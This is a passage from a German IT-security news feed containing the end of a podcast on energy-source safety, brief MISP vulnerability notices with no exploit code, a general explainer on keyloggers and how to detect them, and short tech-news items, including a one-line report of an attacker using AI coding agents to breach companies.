https://www.eea.europa.eu/en/analysis/indicators/greenhouse-gas-emission-intensity-of-1</p>

<p>
https://world-nuclear.org/information-library/country-profiles/countries-g-n/germany</p>

<p>

</p>

<p>
https://www.politico.eu/article/friedrich-merz-is-right-to-reject-germanys-nuclear-phase-out-says-iea-chief-fatih-birol/</p>

<p>

</p>

<p>
https://www.politico.eu/article/germany-considers-ramping-up-coal-power-to-avert-energy-crisis/</p>

<p>

</p>

<p>
https://www.iea.org/countries/estonia/electricity</p>

<p>
https://www.iea.org/countries/malta/electricity</p>

<p>

</p>

<p>

</p>

<p>
--------------------</p>

<p>
 </p>

<p>
93 Conclusions</p>

<p>
As we can see, there don't appear to be an abundance of peer reviewed scientific studies that we can simply point to in order to answer the question of safety of all possible major different energy sources once and for all.</p>

<p>

</p>

<p>
Collecting the data to even attempt to answer the question is inherently very difficult as we cannot readily conduct experiments to answer the question, and sources of data are not collected or consolidated in a manner which can answer this question adequately.</p>

<p>

</p>

<p>
94</p>

<p>
The essence of the problem is that most energy industries are not as tightly regulated and monitored to the same degree that say nuclear power or commercial airliners are, so this data is simply not being systematically recorded.</p>

<p>

</p>

<p>
However, a number of people have attempted to make estimates.</p>

<p>

</p>

<p>
95</p>

<p>
Their conclusions would seem to be that nuclear, wind, and solar are roughly equivalent in terms of safety.</p>

<p>
All fossil fuels are much less safe than nuclear, wind, and solar, by as much as several orders of magnitude.</p>

<p>

</p>

<p>
96</p>

<p>
We can however say with a reasonable degree of certainty that if a country shut down their nuclear power plants and kept their fossil fuel plants, particularly coal, then they probably made their people less safe than if they had done things the other way around. </p>

<p>

</p>

<p>
97</p>

<p>
I hope that I have provided some context in which to think about the issue. </p>

<p>

</p>

<p>
Thanks again to brian in ohio for providing the question upon which this episode is based.</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4668/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-5719 | Malware Information Sharing Platform up to 2.3.91 TemplatesController.php filename Remote Code Execution (BID-92740)]]></title>
<description><![CDATA[A vulnerability classified as critical was found in Malware Information Sharing Platform up to 2.3.91. Affected by this issue is some unknown functionality of the file app/Controller/TemplatesController.php. Such manipulation of the argument filename leads to Remote Code Execution.

This vulnerab...]]></description>
<link>https://tsecurity.de/de/3618564/sicherheitsluecken/cve-2015-5719-malware-information-sharing-platform-up-to-2391-templatescontrollerphp-filename-remote-code-execution-bid-92740/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618564/sicherheitsluecken/cve-2015-5719-malware-information-sharing-platform-up-to-2391-templatescontrollerphp-filename-remote-code-execution-bid-92740/</guid>
<pubDate>Tue, 23 Jun 2026 16:07:37 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> was found in <a href="https://vuldb.com/product/malware_information_sharing_platform">Malware Information Sharing Platform up to 2.3.91</a>. Affected by this issue is some unknown functionality of the file <em>app/Controller/TemplatesController.php</em>. Such manipulation of the argument <em>filename</em> leads to Remote Code Execution.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2015-5719">CVE-2015-5719</a>. It is possible to launch the attack remotely. No exploit is available.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-5721 | Malware Information Sharing Platform up to 2.3.89 Serialization populate_event_from_template_attributes.ctp code injection (BID-92739)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in Malware Information Sharing Platform up to 2.3.89. This vulnerability affects unknown code of the file TemplatesController.php/populate_event_from_template_attributes.ctp of the component Serialization. Executing a manipulation can l...]]></description>
<link>https://tsecurity.de/de/3618562/sicherheitsluecken/cve-2015-5721-malware-information-sharing-platform-up-to-2389-serialization-populateeventfromtemplateattributesctp-code-injection-bid-92739/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618562/sicherheitsluecken/cve-2015-5721-malware-information-sharing-platform-up-to-2389-serialization-populateeventfromtemplateattributesctp-code-injection-bid-92739/</guid>
<pubDate>Tue, 23 Jun 2026 16:07:35 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/malware_information_sharing_platform">Malware Information Sharing Platform up to 2.3.89</a>. This vulnerability affects unknown code of the file <em>TemplatesController.php/populate_event_from_template_attributes.ctp</em> of the component <em>Serialization</em>. Executing a manipulation can lead to code injection.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2015-5721">CVE-2015-5721</a>. The attack can be launched remotely. No exploit exists.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-5720 | Malware Information Sharing Platform up to 2.3.89 template-creation ajaxification.js cross site scripting (BID-92738)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in Malware Information Sharing Platform up to 2.3.89. This affects an unknown part of the file add.ctp/edit.ctp/ajaxification.js of the component template-creation. Performing a manipulation results in cross site scripting.

Thi...]]></description>
<link>https://tsecurity.de/de/3618554/sicherheitsluecken/cve-2015-5720-malware-information-sharing-platform-up-to-2389-template-creation-ajaxificationjs-cross-site-scripting-bid-92738/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618554/sicherheitsluecken/cve-2015-5720-malware-information-sharing-platform-up-to-2389-template-creation-ajaxificationjs-cross-site-scripting-bid-92738/</guid>
<pubDate>Tue, 23 Jun 2026 16:07:24 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, has been found in <a href="https://vuldb.com/product/malware_information_sharing_platform">Malware Information Sharing Platform up to 2.3.89</a>. This affects an unknown part of the file <em>add.ctp/edit.ctp/ajaxification.js</em> of the component <em>template-creation</em>. Performing a manipulation results in cross site scripting.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2015-5720">CVE-2015-5720</a>. The attack can be initiated remotely. There is not any exploit available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Was ist ein Keylogger?]]></title>
<description><![CDATA[Keylogger sind Malware der alten Schule. Lesen Sie, wie die Tools zur Tastaturüberwachung funktionieren und warum sie nicht nur etwas für Cyberkriminelle sind.
IM_photo | shutterstock.com



Auch wenn Keylogger schon etliche Jahre auf dem Buckel haben: Sie sind immer noch beliebt und werden häufi...]]></description>
<link>https://tsecurity.de/de/3617156/it-security-nachrichten/was-ist-ein-keylogger/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617156/it-security-nachrichten/was-ist-ein-keylogger/</guid>
<pubDate>Tue, 23 Jun 2026 06:05:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2024/11/Keylogger_IM_photo-shutterstock_16z9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Hands Keyboard Tastatur Unschaerfe 16z9" class="wp-image-3610305" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Keylogger sind Malware der alten Schule. Lesen Sie, wie die Tools zur Tastaturüberwachung funktionieren und warum sie nicht nur etwas für Cyberkriminelle sind.</p>
</figcaption></figure><p class="imageCredit">IM_photo | shutterstock.com</p></div>



<p>Auch wenn Keylogger schon etliche Jahre auf dem Buckel haben: Sie sind immer noch beliebt und werden häufig im Rahmen <a href="https://www.csoonline.com/article/3577944/diese-unternehmen-hats-schon-erwischt.html" title="großangelegter Cyberangriffe" target="_blank">großangelegter Cyberangriffe</a> eingesetzt.</p>



<h2 class="wp-block-heading">Keylogger – Definition</h2>



<p>Der Begriff <a href="https://de.wikipedia.org/wiki/Keylogger" title="Keylogger" target="_blank" rel="noopener">Keylogger</a> bezeichnet eine Art von Überwachungssoftware, die die Tastatureingaben eines Benutzers aufzeichnet. Die Schadsoftware sendet die Daten, die beim Keylogging erfasst werden, an einen Dritten.</p>



<p>Cyberkriminelle nutzen Keylogger, um an persönliche Daten oder sensible Finanzinformationen zu gelangen, die sie dann verkaufen oder anderweitig gewinnbringend nutzen können. Es gibt jedoch auch legitime Verwendungszwecke für Keylogger in Unternehmen – zum Beispiel beim Troubleshooting, dem Optimieren der Benutzerfreundlichkeit oder <a href="https://www.computerwoche.de/article/2798126/welche-kontrollen-die-dsgvo-erlaubt.html" title="um Mitarbeiter legal zu überwachen" target="_blank">um Mitarbeiter legal zu überwachen</a> (je nachdem, welchen Gesetzen sie dabei unterliegen). Darüber hinaus nutzen Strafverfolgungsbehörden und Geheimdienste Keylogging zu Überwachungszwecken. Mehr dazu lesen Sie im Absatz “Einsatzzwecke”.</p>



<h2 class="wp-block-heading">Keylogger – Funktionsweise</h2>



<p>“Keylogger sind Programme, die Algorithmen nutzen, um die Tastaturanschläge durch Mustererkennung und andere Techniken zu überwachen”, erklärt Tom Bain, Vice President Security Strategy bei Morphisec. Der Umfang der von der Keylogger-Software gesammelten Informationen kann dabei variieren: Einfache Formen erfassen nur die Informationen, die auf einer (einzigen) Website oder in einer Anwendung eingegeben werden. Hochentwickelte Keylogging-Programme zeichnen hingegen alles auf (einschließlich der Daten, die bei Copy-Paste-Aktionen anfallen), unabhängig von der Anwendung. Einige Keylogger-Varianten – insbesondere solche, die auf mobile Geräte abzielen – gehen noch weiter und erfassen auch Anrufe (sowohl Anrufverlauf als auch Audio), Informationen aus Messaging-Anwendungen, GPS-Standorte, Screenshots und sogar Mikrofon- und Kameraaufnahmen.</p>



<p>Keylogger können hardware- oder softwarebasiert aufgebaut sein:</p>



<ul class="wp-block-list">
<li><p>Hardwarebasierte Keylogger werden einfach zwischen Tastatur und Computer geschaltet.</p></li>



<li><p>Bei softwarebasierten Keyloggern kann es sich um Applikationen oder Tools handeln, die legal oder illegal installiert werden, in letzterem Fall also das Gerät unwissentlich mit <a title="Malware " href="https://www.computerwoche.de/article/2800283/das-kleine-abc-der-schadsoftware.html" target="_blank">Malware </a>infizieren.</p></li>
</ul>



<p>Die beim Keylogging erfassten Daten werden von der Software per E-Mail oder durch den Upload von Protokolldaten in vordefinierte Websites, Datenbanken oder FTP-Server an den Angreifer zurückgesendet. Ist der Keylogger Instument in einem großen Cyberangriff, ist es sehr wahrscheinlich, dass die Kriminellen sich <a href="https://www.computerwoche.de/article/2798116/was-sie-ueber-rdp-hijacking-wissen-sollten.html" title="per Fernzugriff einloggen können" target="_blank">per Fernzugriff einloggen können</a>, um die Tastaturanschlagsdaten herunterzuladen.</p>



<h2 class="wp-block-heading">Keylogger – Einsatzzwecke</h2>



<p>Die ersten Keylogger wurden bereits in den 1970er Jahren <a href="https://www.cryptomuseum.com/covert/bugs/selectric/index.htm" title="vom sowjetischen Geheimdienst eingesetzt" target="_blank" rel="noopener">vom sowjetischen Geheimdienst eingesetzt</a> (mehr dazu später). Auch diese frühen Keylogger zeichneten auf, was getippt wurde und schickten die Informationen über Funksignale an den KGB zurück.</p>



<p><strong>Wie Cyberkriminelle Keylogger einsetzen</strong></p>



<p>Heute gehören Keylogger zum gängigen Instrumentarium Cyberkrimineller, um finanzielle Informationen wie Bank- und Kreditkartendaten, persönliche Informationen wie E-Mail-Adressen, Passwörter oder sensible Geschäftsinformationen über Prozesse und <a href="https://www.computerwoche.de/article/2764516/schuetzen-sie-ihr-geistiges-eigentum-richtig.html" title="geistiges Eigentum" target="_blank">geistiges Eigentum</a> zu entwenden. Je nach Art der gesammelten Daten (und den Motiven der Angreifer) werden die Informationen <a href="https://www.computerwoche.de/article/2761784/werden-ihre-daten-im-darknet-gehandelt.html" title="auf Darknet-Marktplätzen feilgeboten" target="_blank">auf Darknet-Marktplätzen feilgeboten</a> oder im Rahmen eines größeren Angriffs wiederverwendet.</p>



<p>“Wenn ein Keylogger in der Lage ist, die Tastenanschläge eines Datenbankadministrators in einem großen Unternehmen aufzuzeichnen, eröffnet das dem Angreifer Zugang zu Endpunkten und Servern, die wiederum viele sensible Informationen preisgeben können, die sich <a href="https://www.computerwoche.de/article/2803996/ransomware-erpresser-drohen-mit-daten-outing.html" title="zu Geld machen lassen" target="_blank">zu Geld machen lassen</a>“, erklärt Security-Spezialist Bain.</p>



<p><strong>Keylogger am Arbeitsplatz</strong></p>



<p>Es gibt auch einen großen Markt für legale Keylogging-Apps, wenngleich diese meist ethisch fragwürdig sind. Sie können etwa genutzt werden, um Familienmitglieder, Partner oder Arbeitnehmer auszuspionieren. Wenn der Benutzer eines Geräts davon weiß, dass <a title="Spyware" href="https://www.computerwoche.de/article/2778570/diese-gefahren-bedrohen-ihren-pc.html" target="_blank">Spyware</a> auf seinem Gerät läuft, ist das in vielen Ländern legal. Anwendungen, die Informationen über das Arbeitsverhalten sammeln, sind allerdings nicht nur aus moralischen, sondern auch aus Sicherheitsgründen mit Vorsicht zu genießen. Der Spyware-Anbieter mSpy wurde beispielsweise überführt, in mehreren Fällen unabsichtlich Millionen Datensätze von Opfern einer Ausspähung veröffentlicht zu haben.</p>



<p>Überwachungssoftware dieser Art, die manchmal auch als “<a href="https://www.proofpoint.com/us/blog/insider-threat-management/what-advanced-corporate-keylogging-definition-benefits-and-uses" title="Corporate Keylogging" target="_blank" rel="noopener">Corporate Keylogging</a>” bezeichnet wird, kann indes für Testing, Debugging und die Verbesserung der User Experience nützlich sein. “In einer seriösen Umgebung werden Keylogger beispielsweise eingesetzt, um zu überprüfen, ob IT-Sicherheits- und Compliance-Vorschriften eingehalten werden”, weiß Simon Sharp, International Vice President beim Sicherheitsanbieter ObserveIT. “Ein Administrator kann dann sofort feststellen, wer ein bestimmtes Wort oder einen bestimmten Wert eingegeben hat, der mit einem Sicherheitsvorfall in Verbindung steht. So kann er verstehen, wer wann und warum gegen eine Richtlinie verstoßen hat.”</p>



<p>Die IT-Abteilung kann die Tastaturanschlagsdaten nutzen, um Benutzerprobleme zu identifizieren und zu beheben. Darüber hinaus können die Keylogging-Daten möglicherweise zusätzliche <a href="https://www.computerwoche.de/article/2784085/so-fuehren-sie-it-forensik-in-der-praxis-ein.html" title="forensische Informationen" target="_blank">forensische Informationen</a> nach einem Sicherheitsvorfall bereitstellen. Keylogger können auch dazu genutzt werden, potenzielle Innentäter zu erkennen, die Produktivität der Mitarbeiter zu überwachen oder um sicherzustellen, dass die IT-Ressourcen des Unternehmens nur für berufliche Zwecke genutzt werden. Sämtliche erfassten Keylogging-Daten sollten <a href="https://www.computerwoche.de/article/2650080/faq-was-sie-ueber-verschluesselung-wissen-sollten.html" title="verschlüsselt werden" target="_blank">verschlüsselt werden</a>.</p>



<h2 class="wp-block-heading">Keylogger – Infektionswege</h2>



<p>Es gibt verschiedene Wege, wie Keylogger auf einem Zielsystem platziert werden können. Hardwarebasierte Keylogger erfordern eine physische Handlung des Angreifers vor Ort. Das ist meist schwierig zu bewerkstelligen – aber nicht unmöglich. Auch drahtlose Tastaturen können übrigens <a href="https://keysniffer.net/" title="aus der Ferne ausspioniert werden" target="_blank" rel="noopener">aus der Ferne ausspioniert werden</a>. </p>



<p>Software-basierte Keylogger sind weiter verbreitet und eröffnen mehrere Zugangswege:</p>



<ul class="wp-block-list">
<li><p>Infizierte <a title="Domains" href="https://www.computerwoche.de/article/2802729/was-ist-das-domain-name-system.html" target="_blank">Domains</a> sind eine gängige Angriffsmethode – im Oktober 2018 wurden die .com- und .eu-Domains der Online-Bürosoftware Zoho gesperrt, nachdem sie Keylogging-Malware an Nutzer ausgeliefert hatten. Auch Tausende von WordPress-Webseiten wurden bereits über gefälschte Google-Analytics-Skripte mit Keyloggern infiziert.</p></li>



<li><p>Mit Malware infizierte Apps sind ebenfalls ein Problem. Der Google Play Store hatte in der Vergangenheit bereits des öfteren mit Apps zu kämpfen, die Keylogger enthielten.</p></li>



<li><p>Wie viele andere Arten von Malware sind auch Keylogger oft in Phishing-E-Mails eingebettet. Eine Version des HawkEye-Keyloggers wurde beispielsweise über eine E-Mail-Kampagne mit infizierten Word-Dokumenten verbreitet.</p></li>



<li><p>Einige andere Keylogger-Varianten, wie etwa Fauxspersky, können sich über infizierte USB-Laufwerke verbreiten.</p></li>
</ul>



<p>“Die größte Innovation bei Keyloggern sind integrierte Ausweichtechniken, die es ermöglichen, die Malware an Erkennungsmechanismen wie Antivirus-Software vorbeizuschleusen”, sagt Bain. Viele Keylogger würden inzwischen in Kombination mit <a href="https://www.computerwoche.de/article/2794933/was-sie-ueber-erpressersoftware-wissen-muessen.html" title="Ransomware" target="_blank">Ransomware</a>, <a href="https://www.computerwoche.de/article/2770992/cryptomining-wider-willen.html" title="Cryptominer Malware" target="_blank">Cryptominer Malware</a> oder <a href="https://www.computerwoche.de/article/2790249/so-funktionieren-mirai-reaper-echobot-und-co.html" title="Botnet-Code" target="_blank">Botnet-Code</a> geliefert, so der Experte.</p>



<h2 class="wp-block-heading">6 Wege, um Keylogger zu erkennen und entfernen</h2>



<p>Die folgenden Ratschläge stellen die nach allgemeiner Auffassung wirksamsten Schritte dar, um die Auswirkungen unerwünschter Keylogger zu minimieren:</p>



<p><strong>1. Ressourcen, Prozesse und Daten überwachen</strong></p>



<p>Um einen Keylogger zu finden, kann es hilfreich sein, einen Blick auf die Ressourcenzuweisung, die Hintergrundprozesse und die Daten zu werfen, die vom betreffenden Gerät übertragen werden. Um zu funktionieren, benötigen Keylogger in der Regel <a href="https://www.computerwoche.de/article/2763049/so-umgehen-sie-root-sperren.html" title="Root-Zugriff" target="_blank">Root-Zugriff</a> auf den Zielrechner – ebenfalls ein verräterisches Anzeichen für eine Keylogger-Infektion.</p>



<p><strong>2. Schutz aktualisieren</strong></p>



<p>Da Keylogger oft mit anderen Formen von Malware gebündelt werden, kann die Entdeckung von Keylogger-Malware ein Hinweis auf einen umfassenderen Angriff sein. Aktuelle Virenschutz- und Anti-Rootkit-Lösungen entfernen bekannte Keylogger-Malware. Dennoch empfehlen sich weitere Untersuchungen, um festzustellen, ob der Vorfall Teil eines größeren Angriffs war.</p>



<p><strong>3. Anti-Keylogger-Software einsetzen</strong></p>



<p>Spezielle Anti-Keylogger-Software verschlüsselt Tastaturanschläge, sucht nach bekannten Keyloggern und entfernt sie. Bei ungewöhnlichem Keylogger-ähnlichem Verhalten schlägt sie Alarm. Hilfreich ist es auch, den Root-Zugriff für nicht autorisierte Anwendungen zu sperren und bekannte Spyware in die IT-Blacklist aufzunehmen.</p>



<p><strong>4. Virtuelle Tastaturen nutzen</strong></p>



<p>Virtuelle Onscreen-Keyboards vermindern das Keylogger-Risiko, weil sie Informationen auf andere Weise weitergeben als physische Tastaturen. Das kann sich allerdings auf die Produktivität der Benutzer auswirken. Außerdem wirkt es nicht gegen alle Arten von Keylogger und beseitigt auch nicht die Ursache des Problems.</p>



<p><strong>5. Selbstausführende Dateien deaktivieren</strong></p>



<p>Indem selbstausführende Dateien auf extern angeschlossenen Geräten wie etwa USB-Devices deaktiviert werden und Dateien lediglich eingeschränkt auf und von externen Rechnern kopiert werden können, lässt sich das Risiko einer Keylogger-Infektion ebenfalls verringern.</p>



<p><strong>6. Strikte Richtlinien durchsetzen</strong></p>



<p>Der beste Weg für Unternehmen, sich vor Keylogger-Malware zu schützen, besteht in vielschichtigen Kennwortrichtlinien und einer Mehr-Faktor-Authentifizierung für alle Unternehmenskonten und -geräte. Auch im Fall von Keylogging reicht durchschnittliche Antivirus-Technologie nicht mehr aus.</p>



<h2 class="wp-block-heading">Keylogger-Historie – berühmte Beispiele</h2>



<ul class="wp-block-list">
<li><p>Der älteste bekannte Keylogger entstammt dem Prä-Computerzeitalter: Der sowjetische Geheimdienst entwickelte in den 1970er Jahren ein Device, das in elektrischen IBM-Schreibmaschinen versteckt werden konnte und Informationen über Tastenanschläge per Funk übermittelte. Diese frühen Keylogger wurden in US-Botschaften in Moskau und Leningrad eingesetzt. </p></li>



<li><p>Der erste Computer-Keylogger wurde 1983 vom damaligen Doktoranden <a title="Perry Kivolowitz" href="https://twitter.com/PerryKivolowitz" target="_blank" rel="noopener">Perry Kivolowitz</a> als Proof of Concept entwickelt. </p></li>



<li><p>Ein besonders bemerkenswertes Beispiel für einen Keylogger “in freier Wildbahn” wurde 2015 “im Bundle” mit einer Modifikation für das Videospiel Grand Theft Auto V <a title="verbreitet" href="https://uk.pcmag.com/games/41973/some-gta-v-modders-hit-with-keylogger" target="_blank" rel="noopener">verbreitet</a>. </p></li>



<li><p>Im Jahr 2017 wurde bekannt, dass Hunderte von Laptop-Modellen aus dem Hause Hewlett-Packard mit einem Keylogger <a title="ausgeliefert wurden" href="https://www.csoonline.com/article/3241237/keylogger-found-in-keyboard-driver-of-475-hp-notebook-models.html" target="_blank">ausgeliefert wurden</a>. Das Unternehmen bestand allerdings darauf, dass es sich um ein Tool zur Diagnose der Tastaturleistung handelte, das vor der Auslieferung hätte gelöscht werden müssen.</p></li>
</ul>



<p><strong>Dieser Artikel ist <a href="https://www.csoonline.com/article/566645/keyloggers-explained-how-attackers-record-computer-inputs.html" target="_blank">im Original</a> bei unserer Schwesterpublikation CSOonline.com erschienen.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Music veröffentlicht erstmals die meistgestreamten Künstler aller Zeiten]]></title>
<description><![CDATA[Cupertino brachte Apple Music Ende Juni 2015 an den Start, er existiert also seit über zehn Jahren. Apple nutzt die Gunst der Stunde und veröffentlicht ... Weiterlesen ...
Der Beitrag Apple Music veröffentlicht erstmals die meistgestreamten Künstler aller Zeiten erschien zuerst auf Apfelpage.]]></description>
<link>https://tsecurity.de/de/3615874/ios-mac-os/apple-music-veroeffentlicht-erstmals-die-meistgestreamten-kuenstler-aller-zeiten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615874/ios-mac-os/apple-music-veroeffentlicht-erstmals-die-meistgestreamten-kuenstler-aller-zeiten/</guid>
<pubDate>Mon, 22 Jun 2026 16:57:36 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img width="2140" height="1044" src="https://www.apfelpage.de/wp-content/uploads/2026/06/Apple-Music-zweitbeliebtester-Dienst.jpg" class="type:primaryImage wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.apfelpage.de/wp-content/uploads/2026/06/Apple-Music-zweitbeliebtester-Dienst.jpg 2140w, https://www.apfelpage.de/wp-content/uploads/2026/06/Apple-Music-zweitbeliebtester-Dienst-570x278.jpg 570w, https://www.apfelpage.de/wp-content/uploads/2026/06/Apple-Music-zweitbeliebtester-Dienst-768x375.jpg 768w, https://www.apfelpage.de/wp-content/uploads/2026/06/Apple-Music-zweitbeliebtester-Dienst-1536x749.jpg 1536w, https://www.apfelpage.de/wp-content/uploads/2026/06/Apple-Music-zweitbeliebtester-Dienst-2048x999.jpg 2048w" sizes="(max-width: 2140px) 100vw, 2140px"></figure>
<p>Cupertino brachte Apple Music Ende Juni 2015 an den Start, er existiert also seit über zehn Jahren. Apple nutzt die Gunst der Stunde und veröffentlicht ... <a title="Apple Music veröffentlicht erstmals die meistgestreamten Künstler aller Zeiten" class="read-more" href="https://www.apfelpage.de/news/apple-music-veroeffentlicht-erstmals-die-meistgestreamten-kuenstler-aller-zeiten/" aria-label="Mehr Informationen über Apple Music veröffentlicht erstmals die meistgestreamten Künstler aller Zeiten">Weiterlesen ...</a></p>
<p>Der Beitrag <a href="https://www.apfelpage.de/news/apple-music-veroeffentlicht-erstmals-die-meistgestreamten-kuenstler-aller-zeiten/">Apple Music veröffentlicht erstmals die meistgestreamten Künstler aller Zeiten</a> erschien zuerst auf <a href="https://www.apfelpage.de/">Apfelpage</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Angreifer ohne Fachwissen hackt 14 Firmen mit Claude und Codex - it-daily.net]]></title>
<description><![CDATA[Seine mangelnden Fachkenntnisse glich die KI aus. Sicherheitsforscher von OALABS haben einen Cyberangriff analysiert, nachdem ein Akteur vollständige ...]]></description>
<link>https://tsecurity.de/de/3614925/it-security-nachrichten/angreifer-ohne-fachwissen-hackt-14-firmen-mit-claude-und-codex-it-dailynet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614925/it-security-nachrichten/angreifer-ohne-fachwissen-hackt-14-firmen-mit-claude-und-codex-it-dailynet/</guid>
<pubDate>Mon, 22 Jun 2026 10:52:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Seine mangelnden Fachkenntnisse glich die KI aus. Sicherheitsforscher von OALABS haben einen Cyberangriff analysiert, nachdem ein Akteur vollständige ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Angreifer ohne Fachwissen hackt 14 Firmen mit Claude und Codex]]></title>
<description><![CDATA[Ein Angreifer hat mithilfe von Claudes Code-Agenten und OpenAIs Codex 14 Unternehmen kompromittiert. Seine mangelnden Fachkenntnisse glich die KI aus.

Tags: #Cyber Crime | #Künstliche Intelligenz]]></description>
<link>https://tsecurity.de/de/3614871/it-security-nachrichten/angreifer-ohne-fachwissen-hackt-14-firmen-mit-claude-und-codex/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614871/it-security-nachrichten/angreifer-ohne-fachwissen-hackt-14-firmen-mit-claude-und-codex/</guid>
<pubDate>Mon, 22 Jun 2026 10:23:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2025/02/KI_Hacker_Shutterstock_1329781028_1920.jpg" class="attachment-full size-full wp-post-image" alt="KI Hacker Shutterstock 1329781028 1920" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2025/02/KI_Hacker_Shutterstock_1329781028_1920.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2025/02/KI_Hacker_Shutterstock_1329781028_1920-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2025/02/KI_Hacker_Shutterstock_1329781028_1920-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2025/02/KI_Hacker_Shutterstock_1329781028_1920-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2025/02/KI_Hacker_Shutterstock_1329781028_1920-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Angreifer ohne Fachwissen hackt 14 Firmen mit Claude und Codex 3"></p>
    Ein Angreifer hat mithilfe von Claudes Code-Agenten und OpenAIs Codex 14 Unternehmen kompromittiert. Seine mangelnden Fachkenntnisse glich die KI aus.

<p>Tags: <a href="https://www.it-daily.net/thema/cyber-crime">#Cyber Crime</a> | <a href="https://www.it-daily.net/thema/kuenstliche-intelligenz">#Künstliche Intelligenz</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Week in Review: Most popular stories on GeekWire for the week of June 14, 2026]]></title>
<description><![CDATA[See the technology stories that people were reading on GeekWire for the week of June 14, 2026. Read More]]></description>
<link>https://tsecurity.de/de/3613768/it-nachrichten/week-in-review-most-popular-stories-on-geekwire-for-the-week-of-june-14-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3613768/it-nachrichten/week-in-review-most-popular-stories-on-geekwire-for-the-week-of-june-14-2026/</guid>
<pubDate>Sun, 21 Jun 2026 17:18:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1200" height="630" src="https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1.png" class="webfeedsFeaturedVisual wp-post-image" alt="GeekWire Week in Review" decoding="async" fetchpriority="high" srcset="https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1.png 1200w, https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1-620x326.png 620w" sizes="(max-width: 1200px) 100vw, 1200px"><br>See the technology stories that people were reading on GeekWire for the week of June 14, 2026. <a href="https://www.geekwire.com/2026/geekwire-weekly-roundup-2026-06-14/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[SMPTE Opens Entire Standards Catalog for Free, Removing Century-Old Paywall]]></title>
<description><![CDATA[The Society of Motion Picture and Television Engineers has published over 800 technical standards over the years (as a professional association for the media and entertainment industry). 

But this week SMPTE "announced that its complete Standards catalog, the technical backbone behind everything...]]></description>
<link>https://tsecurity.de/de/3612513/it-security-nachrichten/smpte-opens-entire-standards-catalog-for-free-removing-century-old-paywall/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3612513/it-security-nachrichten/smpte-opens-entire-standards-catalog-for-free-removing-century-old-paywall/</guid>
<pubDate>Sat, 20 Jun 2026 18:52:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Society of Motion Picture and Television Engineers has published over 800 technical standards over the years (as a professional association for the media and entertainment industry). 

